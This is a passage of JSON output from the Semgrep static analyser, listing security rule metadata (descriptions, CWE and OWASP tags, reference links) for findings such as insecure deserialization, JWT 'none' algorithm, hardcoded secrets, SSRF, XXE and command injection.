https://docs.python.org/3/library/multiprocessing.html?highlight=security#multiprocessing.connection.Connection"},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.conn_recv.multiprocessing-recv","id":"python.lang.security.audit.conn_recv.multiprocessing-recv","name":"python.lang.security.audit.conn_recv.multiprocessing-recv","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","LOW CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.conn_recv.multiprocessing-recv"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The password on '$MODEL' is being set without validating the password. Call django.contrib.auth.password_validation.validate_password() with validation functions before setting the password. See https://docs.djangoproject.com/en/3.0/topics/auth/passwords/ for more information."},"help":{"markdown":"The password on '$MODEL' is being set without validating the password. Call django.contrib.auth.password_validation.validate_password() with validation functions before setting the password. See https://docs.djangoproject.com/en/3.0/topics/auth/passwords/ for more information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.audit.unvalidated-password.unvalidated-password)\n - [https://docs.djangoproject.com/en/3.0/topics/auth/passwords/#module-django.contrib.auth.password_validation](https://docs.djangoproject.com/en/3.0/topics/auth/passwords/#module-django.contrib.auth.password_validation)\n","text":"The password on '$MODEL' is being set without validating the password. Call django.contrib.auth.password_validation.validate_password() with validation functions before setting the password. See https://docs.djangoproject.com/en/3.0/topics/auth/passwords/ for more information."},"helpUri":"https://semgrep.dev/r/python.django.security.audit.unvalidated-password.unvalidated-password","id":"python.django.security.audit.unvalidated-password.unvalidated-password","name":"python.django.security.audit.unvalidated-password.unvalidated-password","properties":{"precision":"very-high","tags":["CWE-521: Weak Password Requirements","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.audit.unvalidated-password.unvalidated-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected use of the `none` algorithm in a JWT token. The `none` algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the `none` algorithm. Instead, use an algorithm such as `HS256`."},"help":{"markdown":"Detected use of the `none` algorithm in a JWT token. The `none` algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the `none` algorithm. Instead, use an algorithm such as `HS256`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.java-jwt.jwt-none-alg.jwt-none-alg)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected use of the `none` algorithm in a JWT token. The `none` algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the `none` algorithm. Instead, use an algorithm such as `HS256`."},"helpUri":"https://semgrep.dev/r/kotlin.java-jwt.jwt-none-alg.jwt-none-alg","id":"kotlin.java-jwt.jwt-none-alg.jwt-none-alg","name":"kotlin.java-jwt.jwt-none-alg.jwt-none-alg","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.java-jwt.jwt-none-alg.jwt-none-alg"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"PBKDF2 usage was identified with an insufficient work factor, i.e. an iteration count (rounds) lower than modern guidelines prescribe. Per OWASP guidance, 600K iterations should be used with SHA256"},"help":{"markdown":"PBKDF2 usage was identified with an insufficient work factor, i.e. an iteration count (rounds) lower than modern guidelines prescribe. Per OWASP guidance, 600K iterations should be used with SHA256\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.insufficient-pbkdf2-work-factor-sha256.insufficient-pbkdf2-work-factor-sha256)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n - [https://pages.nist.gov/800-63-3/sp800-63b.html#sec5](https://pages.nist.gov/800-63-3/sp800-63b.html#sec5)\n","text":"PBKDF2 usage was identified with an insufficient work factor, i.e. an iteration count (rounds) lower than modern guidelines prescribe. Per OWASP guidance, 600K iterations should be used with SHA256"},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.insufficient-pbkdf2-work-factor-sha256.insufficient-pbkdf2-work-factor-sha256","id":"swift.commoncrypto.insufficient-pbkdf2-work-factor-sha256.insufficient-pbkdf2-work-factor-sha256","name":"swift.commoncrypto.insufficient-pbkdf2-work-factor-sha256.insufficient-pbkdf2-work-factor-sha256","properties":{"precision":"very-high","tags":["CWE-916: Use of Password Hash With Insufficient Computational Effort","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.insufficient-pbkdf2-work-factor-sha256.insufficient-pbkdf2-work-factor-sha256"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Outlook Team detected"},"help":{"markdown":"Outlook Team detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-outlook-team.detected-outlook-team)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Outlook Team detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-outlook-team.detected-outlook-team","id":"generic.secrets.security.detected-outlook-team.detected-outlook-team","name":"generic.secrets.security.detected-outlook-team.detected-outlook-team","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-outlook-team.detected-outlook-team"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Overwriting `transformLinkUri` or `transformImageUri` to something insecure, or turning `allowDangerousHtml` on, or turning `escapeHtml` off, will open the code up to XSS vectors."},"help":{"markdown":"Overwriting `transformLinkUri` or `transformImageUri` to something insecure, or turning `allowDangerousHtml` on, or turning `escapeHtml` off, will open the code up to XSS vectors.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.react.security.react-markdown-insecure-html.react-markdown-insecure-html)\n - [https://www.npmjs.com/package/react-markdown#security](https://www.npmjs.com/package/react-markdown#security)\n","text":"Overwriting `transformLinkUri` or `transformImageUri` to something insecure, or turning `allowDangerousHtml` on, or turning `escapeHtml` off, will open the code up to XSS vectors."},"helpUri":"https://semgrep.dev/r/typescript.react.security.react-markdown-insecure-html.react-markdown-insecure-html","id":"typescript.react.security.react-markdown-insecure-html.react-markdown-insecure-html","name":"typescript.react.security.react-markdown-insecure-html.react-markdown-insecure-html","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.react.security.react-markdown-insecure-html.react-markdown-insecure-html"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Service '$SERVICE' is explicitly disabling SELinux separation. This runs the service as an unconfined type. Remove 'label:disable' to prevent this."},"help":{"markdown":"Service '$SERVICE' is explicitly disabling SELinux separation. This runs the service as an unconfined type. Remove 'label:disable' to prevent this.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.docker-compose.security.selinux-separation-disabled.selinux-separation-disabled)\n - [https://www.projectatomic.io/blog/2016/03/dwalsh_selinux_containers/](https://www.projectatomic.io/blog/2016/03/dwalsh_selinux_containers/)\n - [https://docs.docker.com/engine/reference/run/#security-configuration](https://docs.docker.com/engine/reference/run/#security-configuration)\n","text":"Service '$SERVICE' is explicitly disabling SELinux separation. This runs the service as an unconfined type. Remove 'label:disable' to prevent this."},"helpUri":"https://semgrep.dev/r/yaml.docker-compose.security.selinux-separation-disabled.selinux-separation-disabled","id":"yaml.docker-compose.security.selinux-separation-disabled.selinux-separation-disabled","name":"yaml.docker-compose.security.selinux-separation-disabled.selinux-separation-disabled","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.docker-compose.security.selinux-separation-disabled.selinux-separation-disabled"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.hardcoded.headers.hardcoded-github-token.hardcoded-github-token)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/javascript.lang.hardcoded.headers.hardcoded-github-token.hardcoded-github-token","id":"javascript.lang.hardcoded.headers.hardcoded-github-token.hardcoded-github-token","name":"javascript.lang.hardcoded.headers.hardcoded-github-token.hardcoded-github-token","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.hardcoded.headers.hardcoded-github-token.hardcoded-github-token"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found user controlled content in `run_string`. This is dangerous because it allows a malicious actor to run arbitrary Python code."},"help":{"markdown":"Found user controlled content in `run_string`. This is dangerous because it allows a malicious actor to run arbitrary Python code.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.dangerous-subinterpreters-run-string.dangerous-subinterpreters-run-string)\n - [https://bugs.python.org/issue43472](https://bugs.python.org/issue43472)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n","text":"Found user controlled content in `run_string`. This is dangerous because it allows a malicious actor to run arbitrary Python code."},"helpUri":"https://semgrep.dev/r/python.lang.security.dangerous-subinterpreters-run-string.dangerous-subinterpreters-run-string","id":"python.lang.security.dangerous-subinterpreters-run-string.dangerous-subinterpreters-run-string","name":"python.lang.security.dangerous-subinterpreters-run-string.dangerous-subinterpreters-run-string","properties":{"precision":"very-high","tags":["CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.dangerous-subinterpreters-run-string.dangerous-subinterpreters-run-string"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Because portions of the logging configuration are passed through eval(), use of this function may open its users to a security risk. While the function only binds to a socket on localhost, and so does not accept connections from remote machines, there are scenarios where untrusted code could be run under the account of the process which calls listen(). To avoid this happening, use the `verify()` argument to `listen()` to prevent unrecognized configurations."},"help":{"markdown":"Because portions of the logging configuration are passed through eval(), use of this function may open its users to a security risk. While the function only binds to a socket on localhost, and so does not accept connections from remote machines, there are scenarios where untrusted code could be run under the account of the process which calls listen(). To avoid this happening, use the `verify()` argument to `listen()` to prevent unrecognized configurations.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.logging.listeneval.listen-eval)\n - [https://docs.python.org/3/library/logging.config.html?highlight=security#logging.config.listen](https://docs.python.org/3/library/logging.config.html?highlight=security#logging.config.listen)\n","text":"Because portions of the logging configuration are passed through eval(), use of this function may open its users to a security risk. While the function only binds to a socket on localhost, and so does not accept connections from remote machines, there are scenarios where untrusted code could be run under the account of the process which calls listen(). To avoid this happening, use the `verify()` argument to `listen()` to prevent unrecognized configurations."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.logging.listeneval.listen-eval","id":"python.lang.security.audit.logging.listeneval.listen-eval","name":"python.lang.security.audit.logging.listeneval.listen-eval","properties":{"precision":"very-high","tags":["CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.logging.listeneval.listen-eval"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The preceding call to `$SOURCE` can return a negative value when an error is encountered. This can lead to an out-of-bounds array access and possible memory corruption."},"help":{"markdown":"The preceding call to `$SOURCE` can return a negative value when an error is encountered. This can lead to an out-of-bounds array access and possible memory corruption.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.memory.negative-return-value-array-index.negative-return-value-array-index)\n - [https://cwe.mitre.org/data/definitions/787.html](https://cwe.mitre.org/data/definitions/787.html)\n","text":"The preceding call to `$SOURCE` can return a negative value when an error is encountered. This can lead to an out-of-bounds array access and possible memory corruption."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.memory.negative-return-value-array-index.negative-return-value-array-index","id":"cpp.lang.security.memory.negative-return-value-array-index.negative-return-value-array-index","name":"cpp.lang.security.memory.negative-return-value-array-index.negative-return-value-array-index","properties":{"precision":"very-high","tags":["CWE-787: Out-of-bounds Write","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.memory.negative-return-value-array-index.negative-return-value-array-index"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"DOCTYPE declarations are enabled for this DocumentBuilderFactory. This is vulnerable to XML external entity attacks. Disable this by setting the feature \"http://apache.org/xml/features/disallow-doctype-decl\" to true. Alternatively, allow DOCTYPE declarations and only prohibit external entities declarations. This can be done by setting the features \"http://xml.org/sax/features/external-general-entities\" and \"http://xml.org/sax/features/external-parameter-entities\" to false."},"help":{"markdown":"DOCTYPE declarations are enabled for this DocumentBuilderFactory. This is vulnerable to XML external entity attacks. Disable this by setting the feature \"http://apache.org/xml/features/disallow-doctype-decl\" to true. Alternatively, allow DOCTYPE declarations and only prohibit external entities declarations. This can be done by setting the features \"http://xml.org/sax/features/external-general-entities\" and \"http://xml.org/sax/features/external-parameter-entities\" to false.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.xxe.documentbuilderfactory-disallow-doctype-decl-missing.documentbuilderfactory-disallow-doctype-decl-missing)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://blog.sonarsource.com/secure-xml-processor](https://blog.sonarsource.com/secure-xml-processor)\n - [https://xerces.apache.org/xerces2-j/features.html](https://xerces.apache.org/xerces2-j/features.html)\n","text":"DOCTYPE declarations are enabled for this DocumentBuilderFactory. This is vulnerable to XML external entity attacks. Disable this by setting the feature \"http://apache.org/xml/features/disallow-doctype-decl\" to true. Alternatively, allow DOCTYPE declarations and only prohibit external entities declarations. This can be done by setting the features \"http://xml.org/sax/features/external-general-entities\" and \"http://xml.org/sax/features/external-parameter-entities\" to false."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.xxe.documentbuilderfactory-disallow-doctype-decl-missing.documentbuilderfactory-disallow-doctype-decl-missing","id":"java.lang.security.audit.xxe.documentbuilderfactory-disallow-doctype-decl-missing.documentbuilderfactory-disallow-doctype-decl-missing","name":"java.lang.security.audit.xxe.documentbuilderfactory-disallow-doctype-decl-missing.documentbuilderfactory-disallow-doctype-decl-missing","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.xxe.documentbuilderfactory-disallow-doctype-decl-missing.documentbuilderfactory-disallow-doctype-decl-missing"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Avoid using `cPickle`, which is known to lead to code execution vulnerabilities. When unpickling, the serialized data could be manipulated to run arbitrary code. Instead, consider serializing the relevant data as JSON or a similar text-based serialization format."},"help":{"markdown":"Avoid using `cPickle`, which is known to lead to code execution vulnerabilities. When unpickling, the serialized data could be manipulated to run arbitrary code. Instead, consider serializing the relevant data as JSON or a similar text-based serialization format.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.deserialization.pickle.avoid-cPickle)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n","text":"Avoid using `cPickle`, which is known to lead to code execution vulnerabilities. When unpickling, the serialized data could be manipulated to run arbitrary code. Instead, consider serializing the relevant data as JSON or a similar text-based serialization format."},"helpUri":"https://semgrep.dev/r/python.lang.security.deserialization.pickle.avoid-cPickle","id":"python.lang.security.deserialization.pickle.avoid-cPickle","name":"python.lang.security.deserialization.pickle.avoid-cPickle","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","LOW CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.deserialization.pickle.avoid-cPickle"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.tainted-ssrf-spring-format.tainted-ssrf-spring-format)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/java.spring.security.tainted-ssrf-spring-format.tainted-ssrf-spring-format","id":"java.spring.security.tainted-ssrf-spring-format.tainted-ssrf-spring-format","name":"java.spring.security.tainted-ssrf-spring-format.tainted-ssrf-spring-format","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","HIGH CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.tainted-ssrf-spring-format.tainted-ssrf-spring-format"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected use of xmlrpc. xmlrpc is not inherently safe from vulnerabilities. Use defusedxml.xmlrpc instead."},"help":{"markdown":"Detected use of xmlrpc. xmlrpc is not inherently safe from vulnerabilities. Use defusedxml.xmlrpc instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.use-defused-xmlrpc.use-defused-xmlrpc)\n - [https://pypi.org/project/defusedxml/](https://pypi.org/project/defusedxml/)\n - [https://docs.python.org/3/library/xml.html#xml-vulnerabilities](https://docs.python.org/3/library/xml.html#xml-vulnerabilities)\n","text":"Detected use of xmlrpc. xmlrpc is not inherently safe from vulnerabilities. Use defusedxml.xmlrpc instead."},"helpUri":"https://semgrep.dev/r/python.lang.security.use-defused-xmlrpc.use-defused-xmlrpc","id":"python.lang.security.use-defused-xmlrpc.use-defused-xmlrpc","name":"python.lang.security.use-defused-xmlrpc.use-defused-xmlrpc","properties":{"precision":"very-high","tags":["CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","LOW CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.use-defused-xmlrpc.use-defused-xmlrpc"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Hardcoded JWT secret or private key is used. This is a Insufficiently Protected Credentials weakness: https://cwe.mitre.org/data/definitions/522.html Consider using an appropriate security mechanism to protect the credentials (e.g. keeping secrets in environment variables)"},"help":{"markdown":"Hardcoded JWT secret or private key is used. This is a Insufficiently Protected Credentials weakness: https://cwe.mitre.org/data/definitions/522.html Consider using an appropriate security mechanism to protect the credentials (e.g. keeping secrets in environment variables)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.jwt.security.jwt-hardcode.jwt-python-hardcoded-secret)\n - [https://semgrep.dev/blog/2020/hardcoded-secrets-unverified-tokens-and-other-common-jwt-mistakes/](https://semgrep.dev/blog/2020/hardcoded-secrets-unverified-tokens-and-other-common-jwt-mistakes/)\n","text":"Hardcoded JWT secret or private key is used. This is a Insufficiently Protected Credentials weakness: https://cwe.mitre.org/data/definitions/522.html Consider using an appropriate security mechanism to protect the credentials (e.g. keeping secrets in environment variables)"},"helpUri":"https://semgrep.dev/r/python.jwt.security.jwt-hardcode.jwt-python-hardcoded-secret","id":"python.jwt.security.jwt-hardcode.jwt-python-hardcoded-secret","name":"python.jwt.security.jwt-hardcode.jwt-python-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-522: Insufficiently Protected Credentials","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: python.jwt.security.jwt-hardcode.jwt-python-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Do not use `math/rand`. Use `crypto/rand` instead."},"help":{"markdown":"Do not use `math/rand`. Use `crypto/rand` instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.crypto.math_random.math-random-used)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#secure-random-number-generation](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#secure-random-number-generation)\n","text":"Do not use `math/rand`. Use `crypto/rand` instead."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.crypto.math_random.math-random-used","id":"go.lang.security.audit.crypto.math_random.math-random-used","name":"go.lang.security.audit.crypto.math_random.math-random-used","properties":{"precision":"very-high","tags":["CWE-338: Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.crypto.math_random.math-random-used"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"AWS Secret Access Key detected"},"help":{"markdown":"AWS Secret Access Key detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-aws-secret-access-key.detected-aws-secret-access-key)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"AWS Secret Access Key detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-aws-secret-access-key.detected-aws-secret-access-key","id":"generic.secrets.security.detected-aws-secret-access-key.detected-aws-secret-access-key","name":"generic.secrets.security.detected-aws-secret-access-key.detected-aws-secret-access-key","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-aws-secret-access-key.detected-aws-secret-access-key"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a logger that logs user input without properly neutralizing the output. The log message could contain characters like ` ` and ` ` and cause an attacker to forge log entries or include malicious content into the logs. Use proper input validation and/or output encoding to prevent log entries from being forged."},"help":{"markdown":"Detected a logger that logs user input without properly neutralizing the output. The log message could contain characters like ` ` and ` ` and cause an attacker to forge log entries or include malicious content into the logs. Use proper input validation and/or output encoding to prevent log entries from being forged.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.log.tainted-log-injection-stdlib-django.tainted-log-injection-stdlib-django)\n - [https://cwe.mitre.org/data/definitions/117.html](https://cwe.mitre.org/data/definitions/117.html)\n - [https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures](https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures)\n","text":"Detected a logger that logs user input without properly neutralizing the output. The log message could contain characters like ` ` and ` ` and cause an attacker to forge log entries or include malicious content into the logs. Use proper input validation and/or output encoding to prevent log entries from being forged."},"helpUri":"https://semgrep.dev/r/python.django.log.tainted-log-injection-stdlib-django.tainted-log-injection-stdlib-django","id":"python.django.log.tainted-log-injection-stdlib-django.tainted-log-injection-stdlib-django","name":"python.django.log.tainted-log-injection-stdlib-django.tainted-log-injection-stdlib-django","properties":{"precision":"very-high","tags":["CWE-117: Improper Output Neutralization for Logs","HIGH CONFIDENCE","OWASP-A09:2021 - Security Logging and Monitoring Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.log.tainted-log-injection-stdlib-django.tainted-log-injection-stdlib-django"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected non-literal calls to Deno.run(). This could lead to a command injection vulnerability."},"help":{"markdown":"Detected non-literal calls to Deno.run(). This could lead to a command injection vulnerability.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.deno.security.audit.deno-dangerous-run.deno-dangerous-run)\n - [https://deno.land/manual/examples/subprocess#simple-example](https://deno.land/manual/examples/subprocess#simple-example)\n","text":"Detected non-literal calls to Deno.run(). This could lead to a command injection vulnerability."},"helpUri":"https://semgrep.dev/r/javascript.deno.security.audit.deno-dangerous-run.deno-dangerous-run","id":"javascript.deno.security.audit.deno-dangerous-run.deno-dangerous-run","name":"javascript.deno.security.audit.deno-dangerous-run.deno-dangerous-run","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.deno.security.audit.deno-dangerous-run.deno-dangerous-run"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Use the latest version of HTTP to ensure you are benefiting from security fixes. Add `http2_enabled = true` to your appservice resource block"},"help":{"markdown":"Use the latest version of HTTP to ensure you are benefiting from security fixes. Add `http2_enabled = true` to your appservice resource block\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.azure.security.appservice.appservice-enable-http2.appservice-enable-http2)\n - [https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/app_service#http2_enabled](https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/app_service#http2_enabled)\n","text":"Use the latest version of HTTP to ensure you are benefiting from security fixes. Add `http2_enabled = true` to your appservice resource block"},"helpUri":"https://semgrep.dev/r/terraform.azure.security.appservice.appservice-enable-http2.appservice-enable-http2","id":"terraform.azure.security.appservice.appservice-enable-http2.appservice-enable-http2","name":"terraform.azure.security.appservice.appservice-enable-http2.appservice-enable-http2","properties":{"precision":"very-high","tags":["CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')","MEDIUM CONFIDENCE","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.azure.security.appservice.appservice-enable-http2.appservice-enable-http2"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts. This approach ensures session cookies are secure by default. It is also possible to use the flask-talisman extension to enforce a secure configuration."},"help":{"markdown":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to 